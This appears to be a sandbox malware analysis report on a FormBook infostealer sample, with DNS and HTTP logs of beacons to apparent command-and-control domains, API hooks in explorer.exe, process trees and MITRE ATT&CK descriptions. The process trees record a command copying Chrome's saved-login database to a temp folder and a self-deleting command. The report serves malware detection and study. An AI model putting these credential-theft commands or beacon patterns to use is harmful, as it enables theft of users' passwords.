May 4, 2021 12:33:55.900505066 CEST	50904	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:55.949421883 CEST	53	50904	8.8.8.8	192.168.2.4
May 4, 2021 12:33:57.807470083 CEST	57525	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:57.881582975 CEST	53	57525	8.8.8.8	192.168.2.4
May 4, 2021 12:34:10.449276924 CEST	53814	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:10.547678947 CEST	53	53814	8.8.8.8	192.168.2.4
May 4, 2021 12:34:36.388665915 CEST	53418	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:36.454451084 CEST	53	53418	8.8.8.8	192.168.2.4
May 4, 2021 12:34:38.470271111 CEST	62833	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:38.532393932 CEST	53	62833	8.8.8.8	192.168.2.4
May 4, 2021 12:34:38.535073042 CEST	59260	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:38.594563007 CEST	53	59260	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 12:32:26.188683987 CEST	192.168.2.4	8.8.8.8	0x351	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
May 4, 2021 12:33:50.169877052 CEST	192.168.2.4	8.8.8.8	0x748b	Standard query (0)	www.589man.com	A (IP address)	IN (0x0001)
May 4, 2021 12:34:10.449276924 CEST	192.168.2.4	8.8.8.8	0x72e	Standard query (0)	www.joomlas123.info	A (IP address)	IN (0x0001)
May 4, 2021 12:34:36.388665915 CEST	192.168.2.4	8.8.8.8	0x1715	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.470271111 CEST	192.168.2.4	8.8.8.8	0x4de1	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.535073042 CEST	192.168.2.4	8.8.8.8	0x509f	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
May 4, 2021 12:33:50.233441114 CEST	8.8.8.8	192.168.2.4	0x748b	Name error (3)	www.589man.com	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:10.547678947 CEST	8.8.8.8	192.168.2.4	0x72e	No error (0)	www.joomlas123.info		199.192.24.139	A (IP address)	IN (0x0001)
May 4, 2021 12:34:36.454451084 CEST	8.8.8.8	192.168.2.4	0x1715	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.532393932 CEST	8.8.8.8	192.168.2.4	0x4de1	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.594563007 CEST	8.8.8.8	192.168.2.4	0x509f	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.joomlas123.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49776	199.192.24.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 12:34:10.740039110 CEST	9644	OUT	GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1 Host: www.joomlas123.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 4, 2021 12:34:11.049376965 CEST	9644	IN	HTTP/1.1 404 Not Found Date: Tue, 04 May 2021 10:34:10 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 328 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 12:32:26.384680033 CEST	162.159.134.233	443	192.168.2.4	49739	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
May 4, 2021 12:32:26.384680033 CEST	162.159.134.233	443	192.168.2.4	49739	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xB3 0x3C
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x33 0x3C
GetMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x33 0x3C
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xB3 0x3C

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: f97e137e_by_Libranalysis.exe PID: 6944 Parent PID: 5940

General

Start time:	12:32:24
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe'
Imagebase:	0x400000
File size:	823808 bytes
MD5 hash:	F97E137E249BB393FD88B7DEC1DDF9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Analysis Process: secinit.exe PID: 4112 Parent PID: 6944

General

Start time:	12:32:40
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\secinit.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\secinit.exe
Imagebase:	0x390000
File size:	9728 bytes
MD5 hash:	174A363BB5A2D88B224546C15DD10906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: explorer.exe PID: 3424 Parent PID: 4112

General

Start time:	12:32:43
Start date:	04/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: ipconfig.exe PID: 1904 Parent PID: 3424

General

Start time:	12:33:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0x1090000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 5544 Parent PID: 1904

General

Start time:	12:33:07
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\SysWOW64\secinit.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6856 Parent PID: 5544

General

Start time:	12:33:07
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 3788 Parent PID: 1904

General

Start time:	12:34:17
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4388 Parent PID: 3788

General

Start time:	12:34:18
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vp21b7dsh.exe PID: 2188 Parent PID: 3424

General

Start time:	12:34:20
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Imagebase:	0xf10000
File size:	9728 bytes
MD5 hash:	174A363BB5A2D88B224546C15DD10906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Stealing of Sensitive Information:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre